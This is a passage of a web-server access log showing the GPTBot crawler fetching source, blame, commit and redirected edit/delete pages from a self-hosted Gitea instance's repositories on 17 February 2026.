+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/Header.tsx" -[17/Feb/2026:15:30:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/Services.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Services.tsx" -[17/Feb/2026:15:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/Services.tsx" -[17/Feb/2026:15:30:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/components/Hero.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/Hero.tsx" -[17/Feb/2026:15:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/components/Hero.tsx" -[17/Feb/2026:15:30:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/Services.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Services.tsx" -[17/Feb/2026:15:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/Services.tsx" -[17/Feb/2026:15:30:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/Footer.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Footer.tsx" -[17/Feb/2026:15:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/Footer.tsx" -[17/Feb/2026:15:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 10071] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[17/Feb/2026:15:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 10071] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[17/Feb/2026:15:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:15:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:15:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore?display=source" [Client 74.7.227.38] [Length 10980] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" -[17/Feb/2026:15:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf?display=source" [Client 74.7.227.38] [Length 11972] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" -[17/Feb/2026:15:30:06 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/$%7BgetInvestingUrl(symbol)%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 11068] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:30:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" -[17/Feb/2026:15:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm/letsencrypt/renewal" -[17/Feb/2026:15:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=html%2fstatus.json" [Client 74.7.227.38] [Length 17705] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" -[17/Feb/2026:15:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12761] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" -[17/Feb/2026:15:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12764] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx" -[17/Feb/2026:15:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" -[17/Feb/2026:15:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" -[17/Feb/2026:15:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12762] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" -[17/Feb/2026:15:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14223] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" -[17/Feb/2026:15:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11320] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" -[17/Feb/2026:15:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14212] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" -[17/Feb/2026:15:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:15:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:15:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" -[17/Feb/2026:15:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12761] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" -[17/Feb/2026:15:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" -[17/Feb/2026:15:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10871] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx" -[17/Feb/2026:15:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14220] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" -[17/Feb/2026:15:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data" [Client 74.7.227.38] [Length 10578] [Gzip 4.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data" -[17/Feb/2026:15:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" -[17/Feb/2026:15:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py?display=source" [Client 74.7.227.38] [Length 12972] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" -[17/Feb/2026:15:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10841] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" -[17/Feb/2026:15:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf?display=source" [Client 74.7.227.38] [Length 11926] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" -[17/Feb/2026:15:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py?display=source" [Client 74.7.227.38] [Length 16099] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" -[17/Feb/2026:15:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf?display=rendered" [Client 74.7.227.38] [Length 10844] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" -[17/Feb/2026:15:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13261] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:15:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 11134] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx" -[17/Feb/2026:15:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal" [Client 74.7.227.38] [Length 50614] [Gzip 9.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal" -[17/Feb/2026:15:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json?display=source" [Client 74.7.227.38] [Length 11684] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json" -[17/Feb/2026:15:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md?display=source" [Client 74.7.227.38] [Length 15795] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" -[17/Feb/2026:15:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" -[17/Feb/2026:15:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" -[17/Feb/2026:15:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" -[17/Feb/2026:15:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh?display=source" [Client 74.7.227.38] [Length 14928] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" -[17/Feb/2026:15:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh?display=source" [Client 74.7.227.38] [Length 14933] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" -[17/Feb/2026:15:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument" [Client 74.7.227.38] [Length 60416] [Gzip 9.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" -[17/Feb/2026:15:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11906] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" -[17/Feb/2026:15:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10418] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm" -[17/Feb/2026:15:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" -[17/Feb/2026:15:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr 